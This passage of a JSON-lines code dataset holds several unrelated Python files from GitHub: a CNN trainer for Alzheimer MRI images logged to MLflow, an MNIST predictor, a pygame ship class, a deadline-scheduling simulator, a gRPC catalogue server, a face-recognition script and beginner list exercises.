*agg_features,\n            *outliers_features,\n        ])\n        \n        ############################################\n        # Groups ###################################\n        ############################################\n        \n        # Just one-hot count, amount sum, amount max\n        groups_skeleton = pd.DataFrame({'small_group': IMPORTANT_GROUPS})\n        \n        group_features = []\n        for fa in (np.size, np.sum, np.max):\n            g_features = (\n                pd.merge(groups_skeleton,\n                         transactions.groupby('small_group').amount_rur.agg(fa),\n                         on='small_group', 
how='left')\n .amount_rur.tolist()\n )\n group_features.extend(g_features)\n \n features.extend([\n *group_features,\n ])\n \n return np.nan_to_num(features)\n \n def extract_from_dataset(self, transactions_df, targets_df, path):\n features = np.array([\n self.extract(transactions_df.query(f'client_id == {client_id}'))\n for client_id in tqdm.tqdm_notebook(targets_df.client_id.values)\n ])\n\n with open(path, 'wb') as f:\n np.save(f, features)\n\n\ndef fill_small_group_na(df):\n na_index = df['small_group'].isna()\n df.loc[na_index, 'small_group'] = NULL_GROUP_ID\n df['small_group'] = df['small_group'].astype('int')\n return df\n\n\nclass TimeSeriesFeatureExtractor():\n def __init__(self, cfg=None):\n self._cfg = cfg\n \n @staticmethod\n def get_ts_skeleton():\n return pd.DataFrame({'trans_date': list(range(SEQ_LENGTH))})\n \n def drop_duplicates_amount_rur(self, transactions_df):\n return (\n transactions_df\n .sort_values(['trans_date', 'amount_rur'], ascending=False)\n .drop_duplicates(['trans_date'], keep='first')\n )\n \n def extract(self, transactions_df):\n skeleton = self.get_ts_skeleton()\n clean_transactions = self.drop_duplicates_amount_rur(transactions_df)\n result = (\n skeleton\n .merge(clean_transactions, how='left', on='trans_date')\n .drop('client_id', axis=1)\n )\n result = fill_small_group_na(result)\n result = result.fillna(0)\n \n return {\n 'small_group_seq': result.small_group.values,\n 'money_seq': result.amount_rur.values\n }\n \n def extract_from_dataset(self, transactions_df, targets_df, paths_dict): \n features = [\n self.extract(transactions_df.query(f'client_id == {client_id}'))\n for client_id in tqdm.tqdm_notebook(targets_df.client_id.values)\n ]\n result = defaultdict(list)\n for features_dict in features:\n for k, v in features_dict.items():\n result[k].append(v)\n \n for k, path in paths_dict.items():\n with open(path, 'wb') as f:\n np.save(f, np.array(result[k]))","repo_name":"dzemidkada/onti-competition","sub_path":"src/feature_extraction_utils.py","file_name":"feature_extraction_utils.py","file_ext":"py","file_size_in_byte":8281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12833181126","text":"import os\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport boto3\nimport mlflow\nimport numpy as np\nimport pandas as pd\nimport splitfolders\nimport tensorflow as tf\nimport tensorflow_addons as tfa\nfrom botocore.client import Config\nfrom sklearn.metrics import classification_report\nfrom tensorflow.keras.layers import Conv2D, Dropout, MaxPool2D\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n# Create a connection to S3 using the Boto3 library\ns3 = boto3.resource('s3',\n endpoint_url=os.getenv('MLFLOW_S3_ENDPOINT_URL'),\n aws_access_key_id=os.getenv('AWS_ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv('AWS_SECRET_ACCESS_KEY'),\n config=Config(signature_version='s3v4'),\n region_name='us-east-1')\n\n# Upload a file to S3 bucket\ns3.Bucket('ipynb-py').upload_file(Path(__file__).name, str(datetime.now()) + Path(__file__).name)\n\n# Set your variables for your environment\nEXPERIMENT_NAME = \"deep-learning-cnn-custom\"\n\n# Set tracking URI to your Heroku application\nmlflow.set_tracking_uri(\"https://mlflow.brainsight.tech\")\n\n# Set experiment's info \nmlflow.set_experiment(EXPERIMENT_NAME)\n\n# Get our experiment info\nexperiment = mlflow.get_experiment_by_name(EXPERIMENT_NAME)\n\n# Call mlflow autolog\nmlflow.tensorflow.autolog()\n\n# Start the 
experiment run\nwith mlflow.start_run(experiment_id=experiment.experiment_id):\n\n # Download the dataset from S3\n data_root_orig = tf.keras.utils.get_file(\n origin='https://brain-disease-detector.s3.eu-west-3.amazonaws.com/alzheimer_no_split_folders_renamed.zip',\n fname='/content',\n cache_subdir=\"/content\",\n archive_format='zip',\n extract=True)\n \n # Get the class names from the directory\n class_names = os.listdir(\n '/content/alzheimer_no_split_folders_renamed')\n\n # Split the dataset into training, validation, and testing sets using the splitfolders library\n splitfolders.ratio('/content/alzheimer_no_split_folders_renamed',\n output='/content/output_alzheimer_no_split_folders_renamed_v1',\n ratio=(0.64, 0.16, 0.20))\n image_dir_path = '.'\n\n # Create a DataFrame with the paths to the image files\n paths = [path.parts[-3:] for path in\n Path(\n '/content/output_alzheimer_no_split_folders_renamed_v1').rglob(\n '*.jpg')]\n df = pd.DataFrame(data=paths, columns=['folder', 'class', 'file_name'])\n print(df.head(10))\n print(df.tail(10))\n\n # Get the number of images in each folder/class of the training, validation, and testing sets\n df.groupby(['folder', 'class']).size()\n df[df[\"folder\"] == \"train\"].groupby([\"class\"]).size() / len(df[df[\"folder\"] == \"train\"])\n df[df[\"folder\"] == \"val\"].groupby([\"class\"]).size() / len(df[df[\"folder\"] == \"val\"])\n df[df[\"folder\"] == \"test\"].groupby([\"class\"]).size() / len(df[df[\"folder\"] == \"test\"])\n\n # Define the ImageDataGenerator objects for the training, validation, and testing sets\n\n train_image_generator = ImageDataGenerator(rescale=1 / 255)\n\n val_image_generator = ImageDataGenerator(rescale=1 / 255)\n\n test_image_generator = ImageDataGenerator(rescale=1 / 255)\n\n # Create the training, validation, and testing datasets\n train_dataset = train_image_generator.flow_from_directory(batch_size=8,\n directory='/mnt/c/Users/Laure/Documents/Dev/ProjetOpenBrain/content/output_alzheimer_no_split_folders_renamed_v1/train',\n shuffle=True,\n target_size=(176, 208),\n class_mode='categorical')\n\n validation_dataset = val_image_generator.flow_from_directory(batch_size=8,\n directory='/mnt/c/Users/Laure/Documents/Dev/ProjetOpenBrain/content/output_alzheimer_no_split_folders_renamed_v1/val',\n shuffle=True,\n target_size=(176, 208),\n class_mode='categorical')\n\n test_dataset = test_image_generator.flow_from_directory(batch_size=1300,\n directory='/mnt/c/Users/Laure/Documents/Dev/ProjetOpenBrain/content/output_alzheimer_no_split_folders_renamed_v1/test',\n shuffle=True,\n target_size=(176, 208))\n \n # Get the images and labels from the training, validation, and testing datasets\n train_images, train_labels = train_dataset.next()\n validation_images, validation_labels = validation_dataset.next()\n test_images, test_labels = test_dataset.next()\n\n # Get the class indices from the training, validation, and testing datasets\n train_dataset.class_indices\n test_dataset.class_indices\n\n # Create the model\n model = tf.keras.Sequential([\n\n Conv2D(filters=16, kernel_size=(3, 3), strides=1, padding=\"same\",\n activation=\"relu\", input_shape=(176, 208, 3)), # the input shape (height, width, channels)\n MaxPool2D(pool_size=2, # the size of the pooling window\n strides=2), # the movement of the pooling on the input\n Dropout(0.1),\n Conv2D(filters=32, kernel_size=(3, 3), strides=1, padding=\"same\",\n activation=\"relu\"), \n MaxPool2D(2, 2),\n Dropout(0.1),\n Conv2D(filters=64, kernel_size=(3, 3), strides=1, 
padding=\"same\",\n activation=\"relu\"),\n MaxPool2D(2, 2),\n Dropout(0.1),\n tf.keras.layers.Flatten(), # this layer turns multi-dimensional images into flat objects\n tf.keras.layers.Dense(128, activation=\"relu\"), # the number of neurons in the layer\n Dropout(0.1),\n tf.keras.layers.Dense(64, activation=\"relu\"),\n tf.keras.layers.Dense(4, activation=\"softmax\")\n ]\n )\n\n model.summary()\n\n # Defining metrics and optimization\n\n METRICS = [\n tf.keras.metrics.CategoricalAccuracy(name='acc'),\n tf.keras.metrics.AUC(name='auc'),\n tfa.metrics.F1Score(num_classes=4, average='macro', name='f1_score')\n ]\n\n callback = tf.keras.callbacks.EarlyStopping(monitor='val_loss',\n patience=3,\n restore_best_weights=False)\n initial_learning_rate = 0.0005\n \n # Define the learning rate schedule\n lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n initial_learning_rate,\n decay_steps=1000,\n decay_rate=0.96,\n staircase=True)\n \n # Compile the model\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=lr_schedule),\n loss=tf.keras.losses.CategoricalCrossentropy(),\n metrics=METRICS)\n\n EPOCHS = 50\n\n # Train the model\n history = model.fit(train_dataset, validation_data=validation_dataset, shuffle=True, epochs=EPOCHS)\n \n train_dataset.class_indices.values()\n type(train_dataset.class_indices.values())\n\n # Evaluation on validation dataset\n _ = model.evaluate(validation_dataset)\n\n # Evaluation on test dataset\n _ = model.evaluate(test_dataset)\n test_images, test_labels = test_dataset.next()\n test_dataset.class_indices.keys()\n\n predicted_labels = model.predict(test_dataset)\n predicted_labels = np.argmax(predicted_labels, axis=1)\n test_labels = np.argmax(test_labels, axis=1)\n target_names = [k + ' : ' + str(v) for k, v in test_dataset.class_indices.items()]\n print(classification_report(test_labels, predicted_labels, target_names=target_names))\n","repo_name":"YuliyaSheichenka/Certification_Bloc_6","sub_path":"AlzheimerCNN_BrainSight.py","file_name":"AlzheimerCNN_BrainSight.py","file_ext":"py","file_size_in_byte":7976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43406865708","text":"import os\nimport pickle\nimport sys\nsys.path.append(os.pardir)\n\nimport numpy as np\n\nfrom dataset.mnist import load_mnist\n\nfrom my_common import stop_watch\n\nfrom ch3_2_4 import sigmoid\nfrom ch3_5_1 import softmax\n\ndef get_data():\n (x_train, t_train), (x_test, t_test) = \\\n load_mnist(normalize=True, flatten=True, one_hot_label=False)\n\n return x_test, t_test\n\ndef init_network():\n with open('sample_weight.pkl', 'rb') as f:\n network = pickle.load(f)\n\n return network\n\ndef predict(network, x):\n W1, W2, W3 = network['W1'], network['W2'], network['W3']\n b1, b2, b3 = network['b1'], network['b2'], network['b3']\n\n a1 = np.dot(x, W1) + b1\n z1 = sigmoid(a1)\n a2 = np.dot(z1, W2) + b2\n z2 = sigmoid(a2)\n a3 = np.dot(z2, W3) + b3\n y = softmax(a3)\n\n return y\n\n@stop_watch\ndef main():\n # 推論処理\n\n # テストデータ\n x, t = get_data()\n # サンプルパラメータ\n network = init_network()\n\n accuracy_cnt = 0\n for i in range(len(x)):\n # x[i]: 1つの画像(784(28*28)ピクセル)\n # t[i]: x[i]のラベル(正解の数字)\n\n # ラベリング出力\n y = predict(network, x[i])\n # 出力のうち確率最大のものを取得\n p = np.argmax(y)\n\n # テスト側ラベルと一致していれば正答数+1\n if p == t[i]:\n accuracy_cnt += 1\n\n print('Accuracy: ' + str(float(accuracy_cnt) / len(x)))\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"tnbe21/my-deep-learning-from-scratch","sub_path":"ch3_neural_network/ch3_6_2_predict_mnist.py","file_name":"ch3_6_2_predict_mnist.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25097609423","text":"#Imports\r\nimport pygame\r\n\r\n#Classes\r\n\r\nclass Ship():\r\n\t\"\"\"This class contains vaues & actions our ship can perform in Zims invasion.\"\"\"\r\n\t\r\n\t#Constructor\r\n\tdef __init__(self,screen,current_settings):\r\n\t\t\r\n\t\t#Creating attributes for passed in values in use.\t\t\r\n\t\tself.screen = screen\r\n\t\tself.current_settings = current_settings\r\n\t\t\r\n\r\n\t\t#Load up ship image \r\n\t\tself.image = pygame.image.load('images/starfighter.bmp')\r\n\t\tself.rect = self.image.get_rect()\r\n\t\tself.screen_rect = screen.get_rect()\r\n\r\n\t\t#This sets up the start position on the display.\r\n\t\tself.rect.centerx = self.screen_rect.centerx\r\n\t\t\r\n\t\t#Creates float type of the ships current center for finer adjustment\r\n\t\tself.center = float(self.rect.centerx)\r\n\r\n\t\tself.rect.bottom = self.screen_rect.bottom\r\n\r\n\t\t#Movement flags\r\n\t\tself.move_right = False\r\n\t\tself.move_left = False\r\n\r\n\t#Methods\r\n\t\r\n\tdef blitme(self):\r\n\t\tself.screen.blit(self.image,self.rect)\r\n\r\n\tdef update_position(self):\r\n\t\t\"\"\"This method is used to check & perform the current movements of the ship.\"\"\"\r\n\t\tif self.move_right and self.rect.right < self.screen_rect.right:\r\n\t\t\tself.center += self.current_settings.ship_speed\r\n\t\tif self.move_left and self.rect.left > 0:\r\n\t\t\tself.center -= self.current_settings.ship_speed\r\n\t\t\t\r\n\t\t#Convert back to integer implicitly to perform movement\r\n\t\tself.rect.centerx = self.center\t","repo_name":"RyanMolyneux/Learning_Python","sub_path":"Alien_Invasion_Pr1/player_ship.py","file_name":"player_ship.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38489890186","text":"\"\"\"\nThis code runs the math behind the system\n\n-1 = tasks not schedulable\n\nInput Format = [Label, Worst Case, Period, Release, Invocation1...]\n\nOutput\n\"\"\"\nimport numpy as np\n\na = np.array([[0,3,8,0,2,1],[1,3,10,0,1,1],[2,1,14,0,1,1]])\n#a = np.array([[0,9,8,0,9,1]])\nz=0\nTend=-1\n\ndef sortit(a):\n i=0\n order = 1\n x = a.shape[0]\n while order==1:\n order=0\n for i in range(x-1):\n if (a[i,2] <= a[i+1,2]) and (a[i,3] == -1) and (a[i+1,3]!=-1):\n a[[i, i + 1]] = a[[i + 1, i]]\n order=1\n elif (a[i, 2] > a[i + 1, 2]) and (a[i + 1, 3] == -1) and (a[i,3]==-1):\n a[[i, i + 1]] = a[[i + 1, i]]\n order = 1\n elif (a[i,2]>a[i+1,2]) and (a[i+1,3]!=-1):\n a[[i,i+1]]=a[[i+1,i]]\n order=1\n\n\n return a\n\ndef findnext(a,Release,x):\n for i in range(x):\n if (Release[0,0]==a[i,0]) and (Release[0,3]!=-1):\n return i\n exit(-99)\n\n\ndef GetValues(a,Release,x,y):\n Value=np.zeros((x,2))\n\n for r in range(x):\n for i in range(x):\n if a[i,0]==Release[r,0]:\n Value[r,1]=a[i,2]\n # If released\n if Release[r,3]==0:\n Value[r,0]=a[i,1]\n elif Release[r,3]==-1 and Release[r,1]==0:\n Value[r,0]=a[i,1]\n\n else:\n temp=int(Release[r,1])\n Value[r,0]=a[i,temp+3]\n return Value\n\n\ndef calculateFrequency(a,Release,x,y,z):\n Values=GetValues(a,Release,x,y)\n #print(Values)\n Freq=0\n for r in range(x):\n Freq = Freq + Values[r, 0] / Values[r, 1]\n if z==1:\n a=0.5\n for i in range(3):\n temp = 
Freq-a\n            if temp<0:\n                Freq=a\n                return Freq\n            a=a+0.25\n\n    return Freq\n\ndef CheckNextRelease(Release,TF,x,Tend):\n    if TF>=Tend and Tend!=-1:\n        TF=Tend\n        return TF\n\n    for i in range(x):\n        if Release[i,3]==-1:\n            if TF <= Release[i , 2]:\n                return TF\n\n\n            else:\n                temp = Release[i , 2]\n                return temp\n\n        elif Release[i, 2] < TF and Release[i, 3] != -1:\n            temp = Release[i, 2]\n            return temp\n\n    return TF\n\ndef assignoutput(a,b,output,Freq,TF,index):\n    output[index, 2] = Freq\n\n    output[index, 0] = output[index-1,1]\n    output[index, 1] = TF\n    if b!=-1:\n        output[index, 3] = a[b, 0]\n    else:\n        output[index,3] = -1\n    return output\n\ndef ReleaseNext(a,Release,x):\n    for i in range(x):\n        for R in range(x):\n            if a[R,0]==Release[i,0]:\n                t=R\n        if Release[i,3]==-1:\n            Release[i,3]=0\n            Release[i,2]=Release[i,2]+a[t,2]\n            return Release\n\ndef checkfinished(Release,x,y):\n    for i in range(x):\n        if Release[i,1]!=y:\n            return 1\n        elif Release[i,0]==-1 and Release[i,2]==0:\n            return 0\n    return 0\n\ndef checkRelease(Release,x):\n    for i in range(x):\n        if Release[i,3]!=-1:\n            return 0\n    return 1\n\ndef errorHandle(Release,output,x,index):\n    #check if any tasks failed to run before deadline\n    for i in range(x):\n        if Release[i,2]>=output[index-1,1] and Release[i,3]!=-1:\n            #If failed to run before deadline created error message in output\n            output[index,:]=output[index-1,:]\n            output[index,2]=-1\n            output[index,3]=Release[i,0]\n            index+=1\n            #Update Release deadline of failed task\n            for R in range(x):\n                if a[R, 0] == Release[i, 0]:\n                    t = R\n            Release[i, 2] = Release[i, 2] + a[t, 2] * (Release[i, 1] + 1)\n            Release[i,1]+=1\n\ndef Run(a,z,Tend):\n    #Initial sorting function to sort earliest deadline first\n    a=sortit(a)\n    i=0\n    x = a.shape[0]\n    y = a.shape[1] - 4\n\n    # Release=[Tag, iteration,Deadline, Release flag, Time remaining on previous iteration]\n\n    Release=np.zeros((x,5))\n\n    for i in range(x):\n        # determining if the task is released at zero or not\n        if a[i,3]==0:\n            # If released at 0 set the task deadline to the period\n            Release[i,2]=a[i,2]\n        else:\n            # If the release is not at 0 set the deadline of the task to 0 and lower the invocation to indicate that the task should not run\n            Release[i,2]=a[i,3]\n            Release[i,3]=-1\n            Release[i,1]=0\n        # Coordinate the tag between the release and input data\n        Release[i,0]=a[i,0]\n    #Sort the Release to reorder for unreleased tasks\n\n    sortit(Release)\n\n    #print(a)\n    #print(Release)\n\n    #Create the output array to be large enough to fit worst case scenario\n\n    #output = np.zeros((10, 4))\n    output=np.zeros((x*x*y*2,4))\n\n    #Initialise variables\n    index=0\n    R=0\n    Freq=0\n\n    #Run one iteration so that there is an output to avoid indexing error\n    Freq=calculateFrequency(a,Release,x,y,z)\n\n    #check if frequency requires running above 100%\n    if Freq>1:\n        Freq=1\n        #print('there will be an error')\n\n    # Associate line of input with Release\n    b = findnext(a, Release, x)\n\n    # Determine end time of task if no interruptions\n    TF = a[b, 4] / Freq\n\n    # Save the time temporarily\n    temp = TF\n    #Check if the task ran to completion\n    TF = CheckNextRelease(Release, TF, x,Tend)\n\n    output[0,3]=Release[0,0]\n    output[0,0]=0\n    output[0,1]=TF\n    output[0,2]=Freq\n    index+=1\n    #print(output)\n\n    #check if the task ran to completion\n    if temp==TF:\n        Release[0,3]=-1\n        Release[0,1]=1\n    else:\n        temp = int(Release[0, 1] + 3)\n        Release[0, 4] = a[b, 4] - (output[index - 1, 1] - output[index - 1, 0]) * Freq\n        ReleaseNext(a, Release, x)\n\n    # Sort Release to put earliest deadline first that has released\n    Release = sortit(Release)\n    #print(Release)\n    #check if we have anything to run\n    while checkfinished(Release,x,y):\n        #check for errors\n        for i in range(x):\n            if Release[i, 2] <= output[index - 1, 1] and Release[i, 3] != -1:\n                # If failed to run before deadline created error message in output\n                output[index, :] = output[index - 1, :]\n                output[index, 2] = -1\n                output[index, 3] = Release[i, 0]\n                index += 1\n                # Update Release deadline of failed task\n                for R in range(x):\n                    if a[R, 0] == Release[i, 0]:\n                        t = R\n                Release[i, 2] = Release[i, 2] + a[t, 2] * (Release[i, 1] + 1)\n                Release[i, 1] += 1\n                Release[i,4]=0\n                if Release[i,1]>=y:\n                    Release[0,2]=np.max(Release)*(y+1)+1\n                    Release[i,3]=-1\n        if TF==Tend and Tend!=-1:\n            return output\n\n        if checkRelease(Release,x):\n            # Ensure earliest deadline task is next to run.\n            sortit(Release)\n            #print(Release)\n            # Set end time equal to start of next release\n            TF=Release[0,2]\n\n            # As no task should be running set task to -1\n            b=-1\n\n            # Calculate the Waiting Frequency cause we can\n            Freq=calculateFrequency(a,Release,x,y,z)\n\n            # Update the output to reflect that we are waiting\n            output=assignoutput(a,b,output,Freq,TF,index)\n\n            # Increment index to reflect the change in state\n            index+=1\n\n            # Since we have hit a release, release the next task\n            Release=ReleaseNext(a,Release,x)\n\n        else:\n            # Ensure first task is next task to run\n            sortit(Release)\n            #print(Release)\n            # Find associate row of a to first row of Release\n            b=findnext(a,Release,x)\n\n            # Calculate the Frequency based on current system state\n            Freq=calculateFrequency(a,Release,x,y,z)\n\n            #Check for over frequency\n            if Freq > 1:\n                Freq = 1\n                #print('there will be an error')\n\n            #Prepare to run next iteration\n            c= int(Release[0,1])+4\n\n            #Calculate the time the task will finish assuming it is running clean\n            if Release[0,4]==0:\n                TF=a[b,c]/Freq + output[index-1,1]\n            #Calculate time to finish the task that has already been started\n            else:\n\n                TF=Release[0,4]/Freq + output[index-1,1]\n\n            #Save the time temporarily\n            temp=TF\n\n            #Check if the task will finish before the next task releases\n            TF=CheckNextRelease(Release,TF,x,Tend)\n\n            #update output regardless of task finishing successfully or not\n            output = assignoutput(a, b, output, Freq, TF, index)\n\n            # Increment index to reflect the change in state\n            index += 1\n\n            #if there was no change in the final time, the task completed successfully, so Release must be updated accordingly\n            if TF==temp:\n                # Increment to show that previous Invocation was run successfully\n                Release[0,1]+=1\n                #remove any leftover time from previous run\n                Release[0,4]=0\n                #Set the flag to show task has run to completion\n                Release[0, 3] = -1\n                # Check if that was the last iteration to run\n                if Release[0,1]>=y:\n                    Release[0,2]=np.max(Release)*(y+1)+1\n\n            # For when they did not match up and the previous task did not finish running\n            else:\n                temp=int(Release[0,1]+3)\n                Release[0,4] = a[b,c]-(output[index-1,1] - output[index-1,0])*Freq\n                ReleaseNext(a,Release,x)\n\n    #print(output)\n    return output\n\n#print(Run(a,z,Tend))\n","repo_name":"DanielLoeffeler/467project","sub_path":"Math.py","file_name":"Math.py","file_ext":"py","file_size_in_byte":9888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74675884588","text":"import requests\nimport backoff\n\n@backoff.on_exception(backoff.expo,\n                      requests.exceptions.RequestException,\n                      max_tries=2)\ndef get_site_info(ip):\n    \"\"\"\n    Takes an IP Address as input and returns an object \n    with the header, 
server info, ip and page\n    :param ip - A valid IP address\n    \"\"\"\n    r = requests.get(\"http://{0}\".format(ip))\n    headers = r.headers\n    page = r.text\n    server = headers.get(\"Server\")\n    return { \"IP\": ip, \"headers\" : headers,\n        \"Server\" : server, \"page\" : page}\n\ndef get_site_info_objs(ip_addresses):\n    \"\"\"\n    Takes a list of IP addresses and returns site info\n    objects for each. Prints error message if call fails\n    unexpectedly\n    :param ip_addresses - A list of valid IP Addresses\n    \"\"\"\n    site_info_objs = []\n    for ip in ip_addresses:\n        try:\n            site_info = get_site_info(ip)\n            site_info_objs.append(site_info)\n        except Exception as e:\n            print(\"Unable to reach IP: {0}. Proceeding...\".format(ip))\n    return site_info_objs\n","repo_name":"kavanista/ip_checker","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42466729606","text":"import subprocess\n\nif __name__ == \"__main__\":\n\n    # python utils/run_kcap.py --create-mocks --noiseless-mocks --root-dir data/KiDS1000/mocks/noisefree/ --KiDS-data-file runs/mocks/cosebis/COSEBIs_KiDS1000_omega_cam.fits --run-type cosebis --run-name cosebis_base --no-c-term --no-2d-c-term --use-nz-files --overwrite\n\n    script = \"utils/run_kcap.py\"\n    root_dir = \"runs/mocks/cosebis/\"\n    \n    base_twopoint_file = \"data/KiDS1000/mocks/noisefree/cosebis_base/data/KiDS/COSEBIs_KiDS1000_omega_cam_mock_noiseless.fits\"\n    \n    # Need to change\n    base_dz_cov_file = \"data/KV450/nofz/DIR_cov.asc\"\n\n    twopoint_file = base_twopoint_file\n    dz_cov_file = base_dz_cov_file\n\n    sampler = \"multinest\"\n    \n    run_type = \"cosebis\"\n    run_name_root = \"fast\"\n    run_name = f\"{run_name_root}_{run_type}\"\n    cmd = [\"--root-dir\", root_dir,\n           \"--run-name\", run_name,\n           \"--run-type\", run_type,\n           \"--KiDS-data-file\", twopoint_file,\n           \"--dz-covariance-file\", dz_cov_file,\n           \"--sampler\", sampler,\n           \"--sampler-config\", \"multinest_efficiency\", \"0.3\",\n           \"--sampler-config\", \"nested_sampling_tolerance\", \"1.0e-2\",\n           \"--cosebis-2d-c-term-file\", \"cosebis/example_files/cosebis/inputs/En_2D_cterm_KV450.ascii\",\n           \"--cosebis-cos4phi-file\", \"cosebis/example_files/cosebis/inputs/En_cos4phi_KV450.ascii\",\n           \"--cosebis-sin4phi-file\", \"cosebis/example_files/cosebis/inputs/En_sin4phi_KV450.ascii\",\n           \"--use-nz-files\",\n           \"--overwrite\"]\n    subprocess.run([\"python\", script] + cmd, check=True)","repo_name":"KiDS-WL/kcap","sub_path":"runs/mocks/cosebis/cosebis_configs.py","file_name":"cosebis_configs.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"25541879002","text":"from concurrent import futures\nimport datetime\nimport logging\n\nimport grpc\nimport redis\nfrom tinydb import TinyDB, Query\n\nimport catalogue_pb2\nimport catalogue_pb2_grpc\n\nclass Catalogue(catalogue_pb2_grpc.CatalogueServicer):\n\n    def GetGames(self, request, context):\n        db = TinyDB('games.json')\n        result = db.all()\n        print('result: ' + str(result))\n        \n        response = catalogue_pb2.GetGamesResponse(games=result)\n        print('response: ' + str(response))\n        \n        # Weblog\n        try:\n            conn = redis.StrictRedis(host='redis', port=6379)\n            conn.set(\"log.catalogue-server.\" + str(datetime.datetime.now()), \"Catalogue.GetGames: \" + str(len(response.games)) + \" games\")\n        except Exception as ex:\n            print('Error:', ex)\n        \n        return response\n\n\ndef serve(port='50053'):\n    
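    # Added note: grpc.server requires an executor; a futures.ThreadPoolExecutor\n    # lets up to max_workers RPCs be handled concurrently (10 below is the stock\n    # grpc example default).\n    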
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n    catalogue_pb2_grpc.add_CatalogueServicer_to_server(Catalogue(), server)\n    server.add_insecure_port(f'[::]:{port}')\n    server.start()\n    logging.info(f'Server started, listening on port {port}')\n    server.wait_for_termination()\n\n\nif __name__ == '__main__':\n    logging.basicConfig(level=logging.INFO)\n    serve()","repo_name":"lochlannoneill/SOFT8026-DataDrivenMicroservices-Docker-gRPC-Redis-RabbitMQ","sub_path":"server/catalogue/catalogue_server.py","file_name":"catalogue_server.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2622543848","text":"import face_recognition as facer\nimport sys, os, fnmatch\nimport cv2\n\nknown_face_encodings = []\nknown_face_names = []\n\n# load images and their names from a directory\ndef set_known_faces(dirname):\n    for img in fnmatch.filter(os.listdir(dirname), '*.jpg'):\n        image = facer.load_image_file(dirname + img)\n        known_face_encodings.append(facer.face_encodings(image)[0])\n        known_face_names.append(img[:-4])\n\ndef main():\n\n    # load and encode the known faces\n    set_known_faces(sys.argv[2])\n\n    # load the image whose faces we want to identify\n    test_img = facer.load_image_file(sys.argv[1])\n\n    # find all faces in the test image and encode them\n    faces = facer.face_locations(test_img)\n    encod_faces = facer.face_encodings(test_img, faces)\n\n    # compare each located face against the known faces\n    for (top, right, bottom, left), encod_face in zip(faces, encod_faces):\n\n        # compare the located face with the known faces\n        matches = facer.compare_faces(known_face_encodings, encod_face)\n\n        # get the index of the identified face\n        if True in matches:\n            foundindex = matches.index(True)\n            name = known_face_names[foundindex]\n        else:\n            name = \"Unknown\"\n\n        # draw a box around each located face with its identified name\n        cv2.rectangle(test_img, (left, top), (right, bottom), (0, 255, 0), 2)\n        cv2.rectangle(test_img, (left, bottom - 35), (right, bottom), (0, 255, 0), cv2.FILLED)\n        cv2.putText(test_img, name, (left + 6, bottom - 6), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1.0, (255, 255, 255), 1)\n\n    # show the results\n    cv2.imshow(\"Face ID\", test_img)\n\n    # exit window\n    cv2.waitKey(0) \n    cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n    main()","repo_name":"lechugalf/face-id","sub_path":"IdentifyFaces/IdentifyFaces.py","file_name":"IdentifyFaces.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"36574136657","text":"\n\n## Python Crash Course\n\n# Exercise 3.6: More Guests: \n# You just found a bigger dinner table, so now more space is available. Think of three more guests to invite to dinner.\n# • Start with your program from Exercise 3-4 or Exercise 3-5. 
\n# Add a print statement to the end of your program informing people that you found a bigger dinner table.\n# • Use insert() to add one new guest to the beginning of your list.\n# • Use insert() to add one new guest to the middle of your list.\n# • Use append() to add one new guest to the end of your list.\n# • Print a new set of invitation messages, one for each person in your list.\n\n\ndef main():\n    \n    # Prepare empty list for invitees \n    dinnerInvitees = []\n\n    # Add invitees one by one to the invitees list\n    dinnerInvitees.append('Andrew Ng')\n    dinnerInvitees.append('Narendra Modi')\n    dinnerInvitees.append('Jordon')\n    sendInvites(dinnerInvitees)\n    \n    # The following person can't make it to the dinner party\n    personWhoCantMake = dinnerInvitees.pop(1)\n\n    # Print that one of the guests can't make it to the party\n    print(personWhoCantMake,\"can't make it to the birthday party!\")\n\n    # The following person is the new guest at the party\n    anotherGuestToInvite = 'Abdul Kalam'\n    print(anotherGuestToInvite,\"is coming to the party!!\")\n    print(\"Sending second set of invites..\")\n\n    # Add the new guest to the list\n    dinnerInvitees.insert(1, anotherGuestToInvite)\n    \n    # Send another set of invites\n    sendInvites(dinnerInvitees)\n\n    # Insert one guest at the top of the list\n    dinnerInvitees.insert(0, 'Aryabhatta')\n\n    # Insert one guest in the middle of the list\n    dinnerInvitees.insert(2, 'Ramanujan')\n\n    # Append one guest to the end of the list\n    dinnerInvitees.append('ShriKrishna')\n\n    # Send invitations one last time\n    sendInvites(dinnerInvitees)\n\n\n\ndef sendInvites(dinnerInvitees):\n    \n    # Send invitation to invitees\n    for i in range(len(dinnerInvitees)):\n        \n        # Generic greeting message\n        greetingMessage = \"Hi \" + str(dinnerInvitees[i]) + \", it's my birthday today, would you join us for the dinner? 
